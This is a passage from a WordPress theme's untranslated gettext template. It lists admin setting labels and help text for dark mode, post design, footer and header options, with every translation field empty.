backend/panels/dark-mode.php:24 msgid "" "You can set custom dark mode background in \"Global Colors > Dark Mode Background\"." msgstr "" #: backend/panels/dark-mode.php:29 msgid "Enable or disable the dark mode whole your website." msgstr "" #: backend/panels/dark-mode.php:35 msgid "Image Opacity" msgstr "" #: backend/panels/dark-mode.php:36 msgid "Reduce the featured image opacity when enabled the dark mode." msgstr "" #: backend/panels/dark-mode.php:42 msgid "Default Dark Mode" msgstr "" #: backend/panels/dark-mode.php:43 msgid "" "Set the dark mode as the default color scheme when users visit your website a the " "first time." msgstr "" #: backend/panels/design.php:16 msgid "Theme Design" msgstr "" #: backend/panels/design.php:32 msgid "The category label display in the post listing." msgstr "" #: backend/panels/design.php:40 msgid "" "To edit color for individual category, navigate to \"Admin Dashboard > Posts > " "Categories > Edit\"." msgstr "" #: backend/panels/design.php:68 msgid "Maximum Entry Categories" msgstr "" #: backend/panels/design.php:69 msgid "" "Input a value to limited numbers of entry category show on all post listing layout, " "useful in case you have many categories per post." msgstr "" #: backend/panels/design.php:70 msgid "Please blank to display all categories" msgstr "" #: backend/panels/design.php:89 backend/panels/single-post.php:560 #: backend/panels/typography.php:464 msgid "Entry Meta" msgstr "" #: backend/panels/design.php:90 msgid "" "These are small elements that display in the post listing ie: author name, date, total " "views, total comments..." msgstr "" #: backend/panels/design.php:98 msgid "Entry Meta Icons" msgstr "" #: backend/panels/design.php:103 backend/panels/single-post.php:592 msgid "\"Posted\" Author Label" msgstr "" #: backend/panels/design.php:104 msgid "Show the \"posted\" text before the post author meta." msgstr "" #: backend/panels/design.php:110 msgid "Published Date Icon" msgstr "" #: backend/panels/design.php:111 msgid "Show the icon before the post date meta." msgstr "" #: backend/panels/design.php:117 msgid "Updated Date Icon" msgstr "" #: backend/panels/design.php:118 msgid "Show the clock icon before the post updated meta." msgstr "" #: backend/panels/design.php:124 msgid "Comment Meta Icon" msgstr "" #: backend/panels/design.php:125 msgid "Show the icon before the post comment meta." msgstr "" #: backend/panels/design.php:131 msgid "Post View Meta Icon" msgstr "" #: backend/panels/design.php:132 msgid "Show the icon before the post view meta." msgstr "" #: backend/panels/design.php:138 msgid "Reading Time Meta Icon" msgstr "" #: backend/panels/design.php:139 msgid "Show the icon before the reading time meta." msgstr "" #: backend/panels/design.php:145 msgid "Category Meta Icon" msgstr "" #: backend/panels/design.php:146 msgid "Show the icon before the post category meta." msgstr "" #: backend/panels/design.php:160 msgid "Reading Speed" msgstr "" #: backend/panels/design.php:165 msgid "Words per Minute" msgstr "" #: backend/panels/design.php:166 msgid "Input number of words per minute to calculate the reading time. Default is 130" msgstr "" #: backend/panels/design.php:180 msgid "Human Time Format" msgstr "" #: backend/panels/design.php:185 msgid "Display Human Time (Ago)" msgstr "" #: backend/panels/design.php:186 msgid "Enable or disable the human time format (\"ago\") for the data post entry meta." msgstr "" #: backend/panels/design.php:200 backend/panels/design.php:337 msgid "Edit Post Link" msgstr "" #: backend/panels/design.php:205 msgid "Edit Link" msgstr "" #: backend/panels/design.php:206 msgid "Display the edit post link for the logged users on the featured image." msgstr "" #: backend/panels/design.php:230 backend/single-metaboxes.php:283 #: backend/single-metaboxes.php:289 msgid "Custom Entry Meta" msgstr "" #: backend/panels/design.php:231 msgid "Setup your custom meta to display in the post listing and single post page." msgstr "" #: backend/panels/design.php:237 msgid "Meta Label" msgstr "" #: backend/panels/design.php:238 msgid "Input the label for this meta." msgstr "" #: backend/panels/design.php:244 msgid "Meta Icon ClassName" msgstr "" #: backend/panels/design.php:245 msgid "Input your custom CSS icon classname to display at the beginning of the meta." msgstr "" #: backend/panels/design.php:246 msgid "" "If you use font Awesome. ensure that the setting in \"Theme Design > Font Awesome\" is " "enabled." msgstr "" #: backend/panels/design.php:254 msgid "Meta Label Position" msgstr "" #: backend/panels/design.php:255 msgid "Select position for the custom meta label at the beginning or end." msgstr "" #: backend/panels/design.php:257 msgid "Prefix" msgstr "" #: backend/panels/design.php:258 msgid "Suffix" msgstr "" #: backend/panels/design.php:265 msgid "Fallback Meta" msgstr "" #: backend/panels/design.php:266 msgid "" "Select a fallback meta for displaying when if the post does not have custom meta value." msgstr "" #: backend/panels/design.php:294 backend/single-metaboxes.php:238 msgid "Featured Image" msgstr "" #: backend/panels/design.php:296 msgid "Select settings for the post featured image on your website." msgstr "" #: backend/panels/design.php:303 backend/panels/header-style.php:24 #: backend/panels/header-style.php:318 backend/panels/header-style.php:569 #: backend/panels/page.php:24 backend/single-metaboxes.php:51 msgid "General Settings" msgstr "" #: backend/panels/design.php:305 msgid "" "Run regenerate thumbnail if you add/remove crop sizes. Please read documentation for " "further information." msgstr "" #: backend/panels/design.php:306 msgid "" "Assigning correct size for layouts is important for the look and give the best " "performance of your website.." msgstr "" #: backend/panels/design.php:313 msgid "Crop Position" msgstr "" #: backend/panels/design.php:314 msgid "Select position to crop the featured image." msgstr "" #: backend/panels/design.php:315 msgid "Recommended select the top position if you have people images." msgstr "" #: backend/panels/design.php:317 msgid "From The Top" msgstr "" #: backend/panels/design.php:318 msgid "From The Center" msgstr "" #: backend/panels/design.php:327 msgid "Define Custom Crop Sizes" msgstr "" #: backend/panels/design.php:328 msgid "Add a Crop Size" msgstr "" #: backend/panels/design.php:329 msgid "" "This option will help you optimize the site speed or increase image quality on your " "website." msgstr "" #: backend/panels/design.php:330 msgid "Input a custom crop size: width x height. For example: 300x200" msgstr "" #: backend/panels/design.php:331 msgid "Create a New Crop Size" msgstr "" #: backend/panels/design.php:338 msgid "Show the edit post link in the featured image for logged users." msgstr "" #: backend/panels/design.php:352 msgid "Default Crop Size Settings" msgstr "" #: backend/panels/design.php:354 msgid "" "WordPress will crop uploaded images to ensure your website use the best image size for " "the blog layouts." msgstr "" #: backend/panels/design.php:355 msgid "Below is the list of image sizes. Enable or disable any size you would like." msgstr "" #: backend/panels/design.php:362 msgid "G1- 330x220" msgstr "" #: backend/panels/design.php:363 backend/panels/design.php:371 #: backend/panels/design.php:379 backend/panels/design.php:387 #: backend/panels/design.php:395 msgid "Enable or disable this image crop size." msgstr "" #: backend/panels/design.php:370 msgid "G2 - 420x280" msgstr "" #: backend/panels/design.php:378 msgid "G3 - 615x410" msgstr "" #: backend/panels/design.php:386 msgid "Original Ratio - 860x0" msgstr "" #: backend/panels/design.php:394 msgid "Original Ratio - 1536x0" msgstr "" #: backend/panels/design.php:418 msgid "Slider Animation" msgstr "" #: backend/panels/design.php:419 msgid "Select settings for post sliders on your website." msgstr "" #: backend/panels/design.php:426 msgid "Auto Play Next Slides" msgstr "" #: backend/panels/design.php:427 msgid "Enable or disable autoplay for the sliders." msgstr "" #: backend/panels/design.php:435 msgid "Auto Play Speed" msgstr "" #: backend/panels/design.php:436 msgid "Input a custom time value to next a slide in milliseconds (default is 5000)." msgstr "" #: backend/panels/design.php:442 msgid "Slide Effect" msgstr "" #: backend/panels/design.php:443 msgid "" "Select a effect for the sliders. This setting will be not available for the carousel " "mode." msgstr "" #: backend/panels/design.php:445 msgid "Slide" msgstr "" #: backend/panels/design.php:446 msgid "Fade" msgstr "" #: backend/panels/design.php:453 msgid "Carousel Free Scroll" msgstr "" #: backend/panels/design.php:454 msgid "Enable or disable free mode when scrolling on the carousels." msgstr "" #: backend/panels/design.php:470 msgid "Post Format Icons" msgstr "" #: backend/panels/design.php:471 msgid "Select settings for your post entry meta." msgstr "" #: backend/panels/design.php:477 msgid "Video Icon" msgstr "" #: backend/panels/design.php:478 msgid "Enable or disable icon for the video post format." msgstr "" #: backend/panels/design.php:484 msgid "Gallery Icon" msgstr "" #: backend/panels/design.php:485 msgid "Enable or disable icon for the gallery post format." msgstr "" #: backend/panels/design.php:491 msgid "Audio Icon" msgstr "" #: backend/panels/design.php:492 msgid "Enable or disable icon for the audio post format." msgstr "" #: backend/panels/design.php:498 msgid "Video Icon Color" msgstr "" #: backend/panels/design.php:499 msgid "" "Select a color value for the video icon. This setting will not apply to bottom right " "layout" msgstr "" #: backend/panels/design.php:507 msgid "Gallery Icon Color" msgstr "" #: backend/panels/design.php:508 msgid "" "Select a color value for the gallery icon. This setting will not apply to bottom right " "layout" msgstr "" #: backend/panels/design.php:515 msgid "Audio Icon Color" msgstr "" #: backend/panels/design.php:516 msgid "" "Select a color value for the audio icon. This setting will not apply to bottom right " "layout." msgstr "" #: backend/panels/design.php:536 msgid "" "Select settings for the read more button on your website. You can enable/disable this " "part per module via Modules Design section." msgstr "" #: backend/panels/design.php:543 msgid "Read More Label" msgstr "" #: backend/panels/design.php:544 msgid "Input the read more label to display on your website. Default is \"Read More\"." msgstr "" #: backend/panels/design.php:549 msgid "Read More Icon" msgstr "" #: backend/panels/design.php:550 msgid "Show a icon after the read more label." msgstr "" #: backend/panels/design.php:567 msgid "Hover Effects" msgstr "" #: backend/panels/design.php:569 msgid "Select hover effect settings for your website." msgstr "" #: backend/panels/design.php:574 msgid "Link Hover Effect" msgstr "" #: backend/panels/design.php:575 msgid "The setting below applies to the post title and hyperlinks." msgstr "" #: backend/panels/design.php:579 backend/panels/page.php:34 #: backend/single-metaboxes.php:62 msgid "Style 2" msgstr "" #: backend/panels/design.php:580 msgid "Style 3" msgstr "" #: backend/panels/design.php:581 msgid "Style 4" msgstr "" #: backend/panels/design.php:582 msgid "Style 5" msgstr "" #: backend/panels/design.php:583 msgid "Style 6" msgstr "" #: backend/panels/design.php:584 msgid "Style 7" msgstr "" #: backend/panels/design.php:585 msgid "Style 8" msgstr "" #: backend/panels/design.php:592 msgid "Menu Hover Effect" msgstr "" #: backend/panels/design.php:593 msgid "The setting below applies to top level menu items." msgstr "" #: backend/panels/design.php:596 msgid "Style 2 (Opacity)" msgstr "" #: backend/panels/design.php:614 msgid "SVG Upload" msgstr "" #: backend/panels/design.php:616 msgid "" "Please ensure that you are using trusted svg sources to avoid XML vulnerabilities." msgstr "" #: backend/panels/design.php:621 msgid "SVG Supported" msgstr "" #: backend/panels/design.php:622 msgid "Support upload file type SVG for your website." msgstr "" #: backend/panels/design.php:639 msgid "Featured GIF" msgstr "" #: backend/panels/design.php:641 msgid "Prevent WordPress convert gif to a static image when uploading." msgstr "" #: backend/panels/design.php:647 msgid "GIF Supported" msgstr "" #: backend/panels/design.php:648 msgid "Enable or disable GIF supported for your website." msgstr "" #: backend/panels/design.php:665 backend/panels/design.php:672 msgid "Round Corner" msgstr "" #: backend/panels/design.php:667 msgid "The small border style in featured images and other element whole the website." msgstr "" #: backend/panels/design.php:673 msgid "Disable round corner style for whole the website." msgstr "" #: backend/panels/design.php:677 msgid "No Border" msgstr "" #: backend/panels/design.php:685 msgid "Custom Round Corner" msgstr "" #: backend/panels/design.php:686 msgid "Input a custom round corner (in px) for your website." msgstr "" #: backend/panels/design.php:687 msgid "The recommended value is 1 to 20. Leave blank to set it as the default." msgstr "" #: backend/panels/design.php:704 msgid "Font Awesome" msgstr "" #: backend/panels/design.php:706 msgid "" "Load font Awesome icons library. Enabling this option may affect to the site " "performance." msgstr "" #: backend/panels/design.php:711 msgid "Load Font Awesome" msgstr "" #: backend/panels/design.php:712 msgid "" "Load font Awesome icons library to your website. This will help you can embed this " "font icons to your widgets and content." msgstr "" #: backend/panels/footer.php:15 msgid "Footer" msgstr "" #: backend/panels/footer.php:16 msgid "" "Select options for your website footer. Navigate to Appearance > Widgets to add " "widgets to footer sections." msgstr "" #: backend/panels/footer.php:23 msgid "Footer Style" msgstr "" #: backend/panels/footer.php:30 msgid "Footer Background" msgstr "" #: backend/panels/footer.php:31 msgid "Select a background for the footer: image, color, etc" msgstr "" #: backend/panels/footer.php:40 msgid "Dark Mode - Footer Background" msgstr "" #: backend/panels/footer.php:41 msgid "Select a background for the footer in the dark mode: image, color, etc" msgstr "" #: backend/panels/footer.php:46 msgid "Left Dotted Style" msgstr "" #: backend/panels/footer.php:47 msgid "A dotted area for display at the left of the footer." msgstr "" #: backend/panels/footer.php:53 msgid "Top Border" msgstr "" #: backend/panels/footer.php:54 msgid "Show a gray border a the top footer." msgstr "" #: backend/panels/footer.php:55 msgid "It will be helpful if you have not set up footer background." msgstr "" #: backend/panels/footer.php:61 backend/panels/header.php:284 msgid "Text Color Scheme" msgstr "" #: backend/panels/footer.php:62 msgid "Select a text color scheme for the footer." msgstr "" #: backend/panels/footer.php:63 msgid "Text color scheme will be set to light in the dark mode." msgstr "" #: backend/panels/footer.php:65 backend/panels/header-style.php:91 #: backend/panels/header-style.php:379 backend/panels/header-style.php:646 #: backend/panels/header.php:288 msgid "Default (Dark Text)" msgstr "" #: backend/panels/footer.php:80 msgid "Footer Widget Section" msgstr "" #: backend/panels/footer.php:82 msgid "" "Select \"Use Ruby Template\" under the \"Footer Widgets Layout\" setting if you use " "Ruby Template shortcode." msgstr "" #: backend/panels/footer.php:83 msgid "" "\"Column Border\" and \"Widget Menu Font Size\" and \"Text Color Scheme\" will not " "apply to Ruby template shortcode." msgstr "" #: backend/panels/footer.php:90 msgid "Footer Widgets Layout" msgstr "" #: backend/panels/footer.php:91 msgid "Select a layout for the footer widget area." msgstr "" #: backend/panels/footer.php:92 msgid "To add content, please navigate to Appearance > Widgets." msgstr "" #: backend/panels/footer.php:94 msgid "4 Columns (3/2/2/3)" msgstr "" #: backend/panels/footer.php:95 msgid "5 Columns (1/1/1/1/1)" msgstr "" #: backend/panels/footer.php:96 msgid "5 Columns (40/15/15/15/15)" msgstr "" #: backend/panels/footer.php:97 msgid "3 Columns (1/2/1)" msgstr "" #: backend/panels/footer.php:106 msgid "Column Border" msgstr "" #: backend/panels/footer.php:107 msgid "Show gray borders between widget columns." msgstr "" #: backend/panels/footer.php:113 msgid "Widget Menu Font Size" msgstr "" #: backend/panels/footer.php:114 msgid "" "Input a font size value (in px) for the default menu widgets are displaying in the " "footer." msgstr "" #: backend/panels/footer.php:115 backend/panels/footer.php:215 msgid "Leave blank if you use the \"Archive & Menu Widgets\" font size setting." msgstr "" #: backend/panels/footer.php:120 msgid "Footer Widgets - Template Shortcode" msgstr "" #: backend/panels/footer.php:122 msgid "Input your template shortcode you would like to use Elementor builder." msgstr "" #: backend/panels/footer.php:136 msgid "Footer Bottom Section" msgstr "" #: backend/panels/footer.php:144 msgid "Footer Logo" msgstr "" #: backend/panels/footer.php:145 msgid "Upload a small logo to display at bottom of the footer." msgstr "" #: backend/panels/footer.php:152 msgid "Dark Mode - Copyright Logo" msgstr "" #: backend/panels/footer.php:153 msgid "Upload a small dark logo to display at bottom of the footer in the dark mode." msgstr "" #: backend/panels/footer.php:191 msgid "Copyright Text" msgstr "" #: backend/panels/footer.php:192 msgid "input your copyright text or HTML." msgstr "" #: backend/panels/footer.php:199 msgid "Copyright Menu" msgstr "" #: backend/panels/footer.php:200 msgid "Select a menu to display in the footer copyright bar." msgstr "" #: backend/panels/footer.php:201 msgid "" "Navigate to Typography > Archive & Menu Widgets > Footer Menus to set the font values." msgstr "" #: backend/panels/footer.php:207 msgid "Copyright - Font Size" msgstr "" #: backend/panels/footer.php:208 msgid "Input a font size value (in px) for the copy right text." msgstr "" #: backend/panels/footer.php:213 msgid "Copyright Menu - Font Size" msgstr "" #: backend/panels/footer.php:214 msgid "Input a font size value (in px) for the footer copyright menu." msgstr "" #: backend/panels/general.php:11 msgid "General settings for your website." msgstr "" #: backend/panels/general.php:17 msgid "Tooltips" msgstr "" #: backend/panels/general.php:18 msgid "Enable or disable tooltips when hovering on icons." msgstr "" #: backend/panels/general.php:27 msgid "The back to top will be invisible on the mobile because it is not helpful." msgstr "" #: backend/panels/general.php:34 msgid "Global Search Placeholder" msgstr "" #: backend/panels/general.php:35 msgid "" "Input default placeholder text for the search form, leave blank to set it as the " "default." msgstr "" #: backend/panels/general.php:36 searchform.php:9 templates/parts.php:480 msgid "Search Headlines, News..." msgstr "" #: backend/panels/general.php:48 msgid "Restore/Backup" msgstr "" #: backend/panels/general.php:49 msgid "Backup all your settings to a file or restore your settings." msgstr "" #: backend/panels/general.php:55 msgid "Restore/Backup Theme Options" msgstr "" #: backend/panels/general.php:56 msgid "We recommend you should create a backup before updating or major changes." msgstr "" #: backend/panels/header-style.php:15 msgid "Header Style 1,2,3" msgstr "" #: backend/panels/header-style.php:18 msgid "The settings below apply to the header style 1, 2 and 3." msgstr "" #: backend/panels/header-style.php:29 backend/panels/header-style.php:323 #: backend/panels/header-style.php:574 msgid "More Menu Button" msgstr "" #: backend/panels/header-style.php:30 backend/panels/header-style.php:324 #: backend/panels/header-style.php:575 msgid "Enable or disable the more button at the end of the navigation." msgstr "" #: backend/panels/header-style.php:37 backend/panels/header-style.php:331 #: backend/panels/header-style.php:582 msgid "Enable or disable the social icons list at the end of the navigation." msgstr "" #: backend/panels/header-style.php:51 backend/panels/header-style.php:596 msgid "Navigation Bar Style & Layout" msgstr "" #: backend/panels/header-style.php:56 backend/panels/header-style.php:350 #: backend/panels/header-style.php:601 msgid "Header Width" msgstr "" #: backend/panels/header-style.php:57 backend/panels/header-style.php:351 #: backend/panels/header-style.php:602 msgid "Select a width style for this header." msgstr "" #: backend/panels/header-style.php:60 backend/panels/header-style.php:354 #: backend/panels/header-style.php:606 msgid "Wrapper (1240px)" msgstr "" #: backend/panels/header-style.php:61 backend/panels/header-style.php:355 #: backend/panels/header-style.php:605 msgid "Full Width (100%)" msgstr "" #: backend/panels/header-style.php:69 backend/panels/header-style.php:614 msgid "Select navigation bar style for these header styles." msgstr "" #: backend/panels/header-style.php:80 msgid "Header Height" msgstr "" #: backend/panels/header-style.php:81 msgid "Input custom height value (px) for this header. Default is 60." msgstr "" #: backend/panels/header-style.php:88 backend/panels/header-style.php:376 #: backend/panels/header-style.php:643 msgid "Mega Menu - Text Color Scheme" msgstr "" #: backend/panels/header-style.php:89 backend/panels/header-style.php:377 #: backend/panels/header-style.php:644 msgid "" "In case you would like to switch layout and text to light when set a dark background " "for sub menu in light mode." msgstr "" #: backend/panels/header-style.php:106 backend/panels/header-style.php:394 #: backend/panels/header-style.php:661 msgid "Navigation Colors" msgstr "" #: backend/panels/header-style.php:112 backend/panels/header-style.php:400 #: backend/panels/header-style.php:480 backend/panels/header-style.php:667 #: backend/panels/header-style.php:746 msgid "Navigation Background" msgstr "" #: backend/panels/header-style.php:113 backend/panels/header-style.php:401 #: backend/panels/header-style.php:668 msgid "Select a background color for the navigation bar of this header." msgstr "" #: backend/panels/header-style.php:114 backend/panels/header-style.php:402 #: backend/panels/header-style.php:439 backend/panels/header-style.php:669 #: backend/panels/header.php:410 msgid "use the option \"To\" to set a gradient background." msgstr "" #: backend/panels/header-style.php:125 backend/panels/header-style.php:413 #: backend/panels/header-style.php:680 msgid "Select a text color for displaying in the navigation bar of this header." msgstr "" #: backend/panels/header-style.php:132 backend/panels/header-style.php:210 #: backend/panels/header-style.php:276 backend/panels/header-style.php:420 #: backend/panels/header-style.php:499 backend/panels/header-style.php:687 #: backend/panels/header-style.php:765 msgid "Hover Text Color" msgstr "" #: backend/panels/header-style.php:133 backend/panels/header-style.php:169 #: backend/panels/header-style.php:277 backend/panels/header-style.php:421 #: backend/panels/header-style.php:458 backend/panels/header-style.php:688 #: backend/panels/header-style.php:724 msgid "Select a text color when hovering." msgstr "" #: backend/panels/header-style.php:140 backend/panels/header-style.php:218 #: backend/panels/header-style.php:284 backend/panels/header-style.php:428 #: backend/panels/header-style.php:507 backend/panels/header-style.php:695 #: backend/panels/header-style.php:773 msgid "Hover Accent Color" msgstr "" #: backend/panels/header-style.php:141 backend/panels/header-style.php:285 #: backend/panels/header-style.php:429 backend/panels/header-style.php:696 msgid "Select a accent color when hovering." msgstr "" #: backend/panels/header-style.php:149 backend/panels/header-style.php:227 #: backend/panels/header-style.php:437 backend/panels/header-style.php:516 #: backend/panels/header-style.php:704 backend/panels/header-style.php:782 msgid "Sub Menu - Background Color" msgstr "" #: backend/panels/header-style.php:150 backend/panels/header-style.php:438 #: backend/panels/header-style.php:705 msgid "" "Select a background color for the sub menu and other dropdown sections of this header." msgstr "" #: backend/panels/header-style.php:160 backend/panels/header-style.php:238 #: backend/panels/header-style.php:449 backend/panels/header-style.php:527 #: backend/panels/header-style.php:715 backend/panels/header-style.php:793 msgid "Sub Menu - Text Color" msgstr "" #: backend/panels/header-style.php:161 backend/panels/header-style.php:450 #: backend/panels/header-style.php:716 msgid "" "Select a text color for displaying in sub menus and other dropdown sections of this " "header." msgstr "" #: backend/panels/header-style.php:168 backend/panels/header-style.php:246 #: backend/panels/header-style.php:457 backend/panels/header-style.php:535 #: backend/panels/header-style.php:723 backend/panels/header-style.php:801 msgid "Sub Menu - Hover Text Color" msgstr "" #: backend/panels/header-style.php:191 backend/panels/header.php:682 #: backend/panels/privacy.php:40 msgid "Background Color" msgstr "" #: backend/panels/header-style.php:192 backend/panels/header-style.php:481 #: backend/panels/header-style.php:747 msgid "Select a background color for the navigation bar of this header in the dark mode." msgstr "" #: backend/panels/header-style.php:203 backend/panels/header-style.php:492 #: backend/panels/header-style.php:758 msgid "" "Select a text color for displaying in the navigation bar of this header in the dark " "mode." msgstr "" #: backend/panels/header-style.php:211 backend/panels/header-style.php:247 #: backend/panels/header-style.php:500 backend/panels/header-style.php:536 #: backend/panels/header-style.php:766 backend/panels/header-style.php:802 msgid "Select a text color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:219 backend/panels/header-style.php:508 #: backend/panels/header-style.php:774 msgid "Select a accent color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:228 backend/panels/header-style.php:517 #: backend/panels/header-style.php:783 msgid "" "Select a background color for the sub menu and other dropdown sections of this header " "in the dark mode." msgstr "" #: backend/panels/header-style.php:239 backend/panels/header-style.php:528 #: backend/panels/header-style.php:794 msgid "" "Select a text color for displaying in sub menus and other dropdown sections of this " "header in the dark mode." msgstr "" #: backend/panels/header-style.php:262 msgid "Transparent Colors" msgstr "" #: backend/panels/header-style.php:263 msgid "The settings below apply to the \"Transparent Header 1,2 and 3\"." msgstr "" #: backend/panels/header-style.php:269 msgid "" "Select a text color for displaying in the navigation bar of the transparent header." msgstr "" #: backend/panels/header-style.php:309 msgid "Header Style 4" msgstr "" #: backend/panels/header-style.php:312 msgid "The settings below apply to the header style 4." msgstr "" #: backend/panels/header-style.php:361 backend/panels/header-style.php:628 msgid "Navigation Height" msgstr "" #: backend/panels/header-style.php:362 msgid "Input custom height value (px) for the navigation bar. Default is 40." msgstr "" #: backend/panels/header-style.php:368 backend/panels/header-style.php:635 msgid "Logo Max Height" msgstr "" #: backend/panels/header-style.php:369 backend/panels/header-style.php:636 msgid "Input a max height value for the logo of this header. Default is 60." msgstr "" #: backend/panels/header-style.php:560 msgid "Header Style 5" msgstr "" #: backend/panels/header-style.php:563 msgid "The settings below apply to the header style 5." msgstr "" #: backend/panels/header-style.php:618 msgid "Top & Bottom Border" msgstr "" #: backend/panels/header-style.php:620 msgid "Dark Top & Bottom Border" msgstr "" #: backend/panels/header-style.php:621 msgid "Border Top & Bottom Shadow" msgstr "" #: backend/panels/header-style.php:629 msgid "" "Input custom height value (px) for the navigation bar of this header. Default is 40px." msgstr "" #: backend/panels/header.php:16 msgid "Header" msgstr "" #: backend/panels/header.php:17 msgid "Select options for your website header." msgstr "" #: backend/panels/header.php:34 msgid "Select the style and other settings for your website header." msgstr "" #: backend/panels/header.php:40 msgid "Global Site Header" msgstr "" #: backend/panels/header.php:42 msgid "The global settings will apply whole the website." msgstr "" #: backend/panels/header.php:43 msgid "" "Select \"Use Ruby Template\" under the \"Global Header Style\" setting if you use Ruby " "Template shortcode." msgstr "" #: backend/panels/header.php:50 msgid "Global Header Style" msgstr "" #: backend/panels/header.php:51 msgid "Select the global header style for your website header." msgstr "" #: backend/panels/header.php:53 msgid "" "Please select setting panel corresponding to the layout you choose for setting up " "background, color and other settings." msgstr "" #: backend/panels/header.php:59 msgid "Global Header Template Shortcode" msgstr "" #: backend/panels/header.php:60 msgid "Input a Ruby Template shortcode for displaying as the website header." msgstr "" #: backend/panels/header.php:61 msgid "" "This setting requires to set \"Use Ruby Template\" in the setting above in order to " "work." msgstr "" #: backend/panels/header.php:76 backend/panels/header.php:82 msgid "Sticky Menu" msgstr "" #: backend/panels/header.php:83 msgid "Enable or disable the sticky feature for the main menu bar." msgstr "" #: backend/panels/header.php:89 msgid "Smart Sticky" msgstr "" #: backend/panels/header.php:90 msgid "Only stick the main menu when scrolling up." msgstr "" #: backend/panels/header.php:112 msgid "More Menu Item" msgstr "" #: backend/panels/header.php:115 msgid "Select options for the more menu and enable/disable it for each header style." msgstr "" #: backend/panels/header.php:121 msgid "" "To add column widgets, navigate to \"Dashboard > Appearance > Widgets > More Menu " "Section\". Please read the documentation for further information." msgstr "" #: backend/panels/header.php:127 msgid "Select columns per row for this section." msgstr "" #: backend/panels/header.php:128 msgid "" "Each widget is added in \"Appearance >Widgets > More Menu Section\" will be " "corresponding to a column." msgstr "" #: backend/panels/header.php:142 msgid "Input a width value (in px) for this section. Leave blank to set a the default." msgstr "" #: backend/panels/header.php:149 backend/panels/header.php:381 msgid "Footer Menu" msgstr "" #: backend/panels/header.php:150 backend/panels/header.php:382 msgid "Select a footer menu to display at the bottom of this section." msgstr "" #: backend/panels/header.php:156 backend/panels/header.php:388 msgid "Footer Copyright" msgstr "" #: backend/panels/header.php:157 backend/panels/header.php:389 msgid "" "Input the footer copyright text to display at the bottom of this section, allow raw " "HTML." msgstr "" #: backend/panels/header.php:173 msgid "Header Search" msgstr "" #: backend/panels/header.php:176 msgid "Select settings for search form to display in the website header." msgstr "" #: backend/panels/header.php:182 msgid "" "To edit the placeholder text of the search form, navigate to \"Theme Options > General " "> Search Placeholder\"." msgstr "" #: backend/panels/header.php:187 msgid "Search Heading" msgstr "" #: backend/panels/header.php:188 msgid "Input a heading for displaying above the search form." msgstr "" #: backend/panels/header.php:189 msgid "" "The heading will show in the \"More\" section and \"Mobile Header Collapse\" section." msgstr "" #: backend/panels/header.php:195 msgid "Header Search Icon" msgstr "" #: backend/panels/header.php:196 msgid "Enable or disable the search icon in the header." msgstr "" #: backend/panels/header.php:203 msgid "Toggle Mode" msgstr "" #: backend/panels/header.php:204 msgid "Select mode for the search button when clicking on." msgstr "" #: backend/panels/header.php:205 msgid "" "Ensure the option \"More Menu - Search Form\" is enabled when you select the \"More " "Menu Triggered\" option." msgstr "" #: backend/panels/header.php:207 msgid "Standard Search Form" msgstr "" #: backend/panels/header.php:208 msgid "More Menu Triggered" msgstr "" #: backend/panels/header.php:215 msgid "Live Search Result" msgstr "" #: backend/panels/header.php:216 msgid "Enable live search result when typing." msgstr "" #: backend/panels/header.php:222 msgid "More Menu - Search Form" msgstr "" #: backend/panels/header.php:223 msgid "Show search form at the top of the more section." msgstr "" #: backend/panels/header.php:231 msgid "Custom Search SVG" msgstr "" #: backend/panels/header.php:232 msgid "Override default search icon with a SVG icon." msgstr "" #: backend/panels/header.php:237 msgid "Mobile Header - Search Icon" msgstr "" #: backend/panels/header.php:238 msgid "Enable or disable search icon in the mobile header." msgstr "" #: backend/panels/header.php:244 msgid "AMP Header - Search Icon" msgstr "" #: backend/panels/header.php:245 msgid "Enable or disable search icon the AMP header." msgstr "" #: backend/panels/header.php:261 templates/header/templates.php:694 #: templates/header/templates.php:699 msgid "Notification" msgstr "" #: backend/panels/header.php:264 msgid "This section will show the user bookmark list and latest blog listing." msgstr "" #: backend/panels/header.php:269 msgid "Notification Section" msgstr "" #: backend/panels/header.php:270 msgid "Enable or disable the notification section on the header." msgstr "" #: backend/panels/header.php:277 msgid "Destination Link" msgstr "" #: backend/panels/header.php:278 msgid "Input a destination URL for the notification panel." msgstr "" #: backend/panels/header.php:285 msgid "Select a text color scheme to fit with the sub menu background." msgstr "" #: backend/panels/header.php:286 msgid "Ensure this section set to Light Text if you select a dark sub-menu background." msgstr "" #: backend/panels/header.php:306 msgid "Mobile Header" msgstr "" #: backend/panels/header.php:309 msgid "The settings below apply to the mobile header." msgstr "" #: backend/panels/header.php:315 msgid "" "To edit the typography, navigate to \"Typography > Menu > Mobile Menu Settings\". " "Navigate to \"Social Profiles\" for the social list." msgstr "" #: backend/panels/header.php:321 msgid "" "Color settings will apply to the tablet and mobile header. Leave blank to set as the " "desktop navigation colors." msgstr "" #: backend/panels/header.php:327 msgid "" "Ensure you have also set \"Dark Mode Colors\" if you use custom colors for the default " "mode." msgstr "" #: backend/panels/header.php:333 msgid "Mobile Header Style" msgstr "" #: backend/panels/header.php:334 msgid "The center logo style is best suited for small width logos." msgstr "" #: backend/panels/header.php:340 msgid "Mobile Header Layout" msgstr "" #: backend/panels/header.php:341 msgid "Select a layout for the mobile header." msgstr "" #: backend/panels/header.php:343 msgid "Left Logo" msgstr "" #: backend/panels/header.php:344 msgid "Center Logo" msgstr "" #: backend/panels/header.php:345 msgid "Left Logo 2" msgstr "" #: backend/panels/header.php:353 msgid "Mobile Navigation Height" msgstr "" #: backend/panels/header.php:354 msgid "Input a custom height value for the mobile navigation, Default is 40px." msgstr "" #: backend/panels/header.php:367 msgid "Collapse Section" msgstr "" #: backend/panels/header.php:373 backend/panels/single-post.php:1627 msgid "Socials List" msgstr "" #: backend/panels/header.php:374 msgid "Enable or disable the socials list." msgstr "" #: backend/panels/header.php:402 msgid "Mobile Header Colors" msgstr "" #: backend/panels/header.php:409 msgid "" "Select a background color for the mobile navigation bar and quick view mobile menu." msgstr "" #: backend/panels/header.php:421 msgid "" "Select a text color for toggle button, search, quick view menu for displaying on the " "mobile header." msgstr "" #: backend/panels/header.php:429 backend/panels/header.php:482 msgid "Collapse Section Background" msgstr "" #: backend/panels/header.php:430 msgid "Select a background color for the collapse section." msgstr "" #: backend/panels/header.php:440 backend/panels/header.php:493 msgid "Collapse Section - Text Color" msgstr "" #: backend/panels/header.php:441 msgid "" "Select a text color for menu item, sub menu item and other elements for displaying in " "the collapse section." msgstr "" #: 